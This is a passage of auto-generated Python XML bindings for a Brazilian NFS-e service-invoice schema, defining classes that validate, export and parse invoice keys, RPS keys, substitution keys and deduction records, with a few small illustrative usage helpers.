self.ChaveNFe = obj_
obj_.original_tagname_ = 'ChaveNFe'
elif nodeName_ == 'ChaveRPS':
obj_ = tpChaveRPS.factory()
obj_.build(child_)
self.ChaveRPS = obj_
obj_.original_tagname_ = 'ChaveRPS'
# end class tpChaveNFeRPS
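def _example_compose_tpChaveNFeRPS():
    # Illustrative sketch (not part of the generated bindings):
    # tpChaveNFeRPS aggregates a tpChaveNFe and a tpChaveRPS child, and its
    # export() delegates to each child's export(). All field values are
    # placeholder assumptions.
    import sys
    par = tpChaveNFeRPS(
        ChaveNFe=tpChaveNFe(InscricaoPrestador=12345678, NumeroNFe=42,
                            CodigoVerificacao='ABC123'),
        ChaveRPS=tpChaveRPS(InscricaoPrestador=12345678, SerieRPS='NF',
                            NumeroRPS=7))
    par.export(sys.stdout, 0)  # note: the ns1 prefix is not declared here
    return par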
class tpChaveNFe(GeneratedsSuper):
"""Chave de identificação da NF-e."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, NumeroNFe=None, CodigoVerificacao=None, RazaoSocialPrestador=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.NumeroNFe = NumeroNFe
self.validate_tpNumero(self.NumeroNFe)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveNFe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveNFe.subclass:
return tpChaveNFe.subclass(*args_, **kwargs_)
else:
return tpChaveNFe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.NumeroNFe is not None or
self.CodigoVerificacao is not None or
self.RazaoSocialPrestador is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveNFe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveNFe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveNFe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveNFe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveNFe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveNFe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.NumeroNFe is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFe>%s</ns1:NumeroNFe>%s' % (self.gds_format_integer(self.NumeroNFe, input_name='NumeroNFe'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'NumeroNFe':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFe')
self.NumeroNFe = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNFe)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
# end class tpChaveNFe
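def _example_export_tpChaveNFe():
    # Illustrative sketch (not part of the generated bindings): serialize a
    # tpChaveNFe into a string buffer. Passing namespacedef_ emits an xmlns
    # declaration; the URI below is a placeholder assumption, not taken
    # from the schema.
    import io
    chave = tpChaveNFe(InscricaoPrestador=12345678, NumeroNFe=42,
                       CodigoVerificacao='ABC123',
                       RazaoSocialPrestador='Empresa Exemplo Ltda')
    buf = io.StringIO()
    chave.export(buf, 0, namespacedef_='xmlns:ns1="urn:example:nfse"')
    return buf.getvalue()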
class tpChaveRPS(GeneratedsSuper):
"""Tipo que define a chave identificadora de um RPS."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, RazaoSocialPrestador=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveRPS.subclass:
return tpChaveRPS.subclass(*args_, **kwargs_)
else:
return tpChaveRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.RazaoSocialPrestador is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
# end class tpChaveRPS
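def _example_tpChaveRPS_datetime():
    # Illustrative sketch (not part of the generated bindings): the
    # constructor accepts DataEmissaoRPS either as a datetime object or as
    # a string, which __init__ above parses with '%Y-%m-%dT%H:%M:%S'.
    rps = tpChaveRPS(InscricaoPrestador=12345678, SerieRPS='NF',
                     NumeroRPS=7, DataEmissaoRPS='2020-01-15T10:30:00')
    return rps.DataEmissaoRPS  # a datetime.datetime instance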
class tpChaveSubstituicaoNFSe(GeneratedsSuper):
"""Chave de identificação para Substituição de uma NFSe."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, CPFCNPJTomador=None, NumeroNFSeSubstituida=None, DataEmissaoNFSeSubstituida=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.CPFCNPJTomador = CPFCNPJTomador
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
self.NumeroNFSeSubstituida = NumeroNFSeSubstituida
self.validate_tpNumero(self.NumeroNFSeSubstituida)
if isinstance(DataEmissaoNFSeSubstituida, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoNFSeSubstituida, '%Y-%m-%d').date()
else:
initvalue_ = DataEmissaoNFSeSubstituida
self.DataEmissaoNFSeSubstituida = initvalue_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveSubstituicaoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveSubstituicaoNFSe.subclass:
return tpChaveSubstituicaoNFSe.subclass(*args_, **kwargs_)
else:
return tpChaveSubstituicaoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpData(self, value):
# Validate type tpData, a restriction on xs:date.
if value is not None and Validate_simpletypes_:
pass
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.CPFCNPJTomador is not None or
self.NumeroNFSeSubstituida is not None or
self.DataEmissaoNFSeSubstituida is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveSubstituicaoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveSubstituicaoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveSubstituicaoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.CPFCNPJTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJTomador>%s</ns1:CPFCNPJTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJTomador), input_name='CPFCNPJTomador')), eol_))
if self.NumeroNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFSeSubstituida>%s</ns1:NumeroNFSeSubstituida>%s' % (self.gds_format_integer(self.NumeroNFSeSubstituida, input_name='NumeroNFSeSubstituida'), eol_))
if self.DataEmissaoNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoNFSeSubstituida>%s</ns1:DataEmissaoNFSeSubstituida>%s' % (self.gds_format_date(self.DataEmissaoNFSeSubstituida, input_name='DataEmissaoNFSeSubstituida'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'CPFCNPJTomador':
CPFCNPJTomador_ = child_.text
CPFCNPJTomador_ = self.gds_validate_string(CPFCNPJTomador_, node, 'CPFCNPJTomador')
self.CPFCNPJTomador = CPFCNPJTomador_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
elif nodeName_ == 'NumeroNFSeSubstituida':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFSeSubstituida')
self.NumeroNFSeSubstituida = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNFSeSubstituida)
elif nodeName_ == 'DataEmissaoNFSeSubstituida':
sval_ = child_.text
dval_ = self.gds_parse_date(sval_)
self.DataEmissaoNFSeSubstituida = dval_
# validate type tpData
self.validate_tpData(self.DataEmissaoNFSeSubstituida)
# end class tpChaveSubstituicaoNFSe
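def _example_tpChaveSubstituicaoNFSe():
    # Illustrative sketch (not part of the generated bindings):
    # DataEmissaoNFSeSubstituida may be given as a '%Y-%m-%d' string, which
    # __init__ above converts to a datetime.date. The CPF/CNPJ value is a
    # placeholder assumption.
    chave = tpChaveSubstituicaoNFSe(
        InscricaoPrestador=12345678,
        CPFCNPJTomador='12345678000199',
        NumeroNFSeSubstituida=10,
        DataEmissaoNFSeSubstituida='2020-01-15')
    return chave.DataEmissaoNFSeSubstituida  # datetime.date(2020, 1, 15)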
class tpDeducoes(GeneratedsSuper):
"""Tipo deduções de nota fiscal."""
subclass = None
superclass = None
def __init__(self, DeducaoPor=None, TipoDeducao=None, CPFCNPJReferencia=None, NumeroNFReferencia=None, ValorTotalReferencia=None, PercentualDeduzir=None, ValorDeduzir=None):
self.original_tagname_ = None
self.DeducaoPor = DeducaoPor
self.validate_tpDeducaoPor(self.DeducaoPor)
self.TipoDeducao = TipoDeducao
self.validate_tpTipoDeducao(self.TipoDeducao)
self.CPFCNPJReferencia = CPFCNPJReferencia
self.validate_tpCPFCNPJnulo(self.CPFCNPJReferencia)
self.NumeroNFReferencia = NumeroNFReferencia
self.validate_tpNumeroNFReferencia(self.NumeroNFReferencia)
self.ValorTotalReferencia = ValorTotalReferencia
self.validate_tpValor(self.ValorTotalReferencia)
self.PercentualDeduzir = PercentualDeduzir
self.validate_tpPercentual(self.PercentualDeduzir)
self.ValorDeduzir = ValorDeduzir
self.validate_tpValor(self.ValorDeduzir)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpDeducoes)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpDeducoes.subclass:
return tpDeducoes.subclass(*args_, **kwargs_)
else:
return tpDeducoes(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpDeducaoPor(self, value):
# Validate type tpDeducaoPor, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['Valor', 'Percentual']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpDeducaoPor' % {"value" : value.encode("utf-8")} )
def validate_tpTipoDeducao(self, value):
# Validate type tpTipoDeducao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['Despesas com Materiais', 'Despesas com Subempreitada', 'Despesas com Mercadorias', 'Servicos de Veiculacao e Divulgacao', 'Servicos', 'Mapa de Const. Civil', '']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoDeducao' % {"value" : value.encode("utf-8")} )
def validate_tpCPFCNPJnulo(self, value):
# Validate type tpCPFCNPJnulo, a restriction on None.
pass
def validate_tpNumeroNFReferencia(self, value):
# Validate type tpNumeroNFReferencia, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumeroNFReferencia' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumeroNFReferencia_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumeroNFReferencia_patterns_, ))
validate_tpNumeroNFReferencia_patterns_ = [['^[0-9]{1,10}$']]
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpPercentual(self, value):
# Validate type tpPercentual, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpPercentual' % {"value" : value} )
if len(str(value)) >= 5:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpPercentual' % {"value" : value} )
def hasContent_(self):
if (
self.DeducaoPor is not None or
self.TipoDeducao is not None or
self.CPFCNPJReferencia is not None or
self.NumeroNFReferencia is not None or
self.ValorTotalReferencia is not None or
self.PercentualDeduzir is not None or
self.ValorDeduzir is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpDeducoes', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpDeducoes')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpDeducoes')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpDeducoes', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpDeducoes'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpDeducoes', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.DeducaoPor is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DeducaoPor>%s</ns1:DeducaoPor>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DeducaoPor), input_name='DeducaoPor')), eol_))
if self.TipoDeducao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoDeducao>%s</ns1:TipoDeducao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoDeducao), input_name='TipoDeducao')), eol_))
if self.CPFCNPJReferencia is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJReferencia>%s</ns1:CPFCNPJReferencia>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJReferencia), input_name='CPFCNPJReferencia')), eol_))
if self.NumeroNFReferencia is not None:
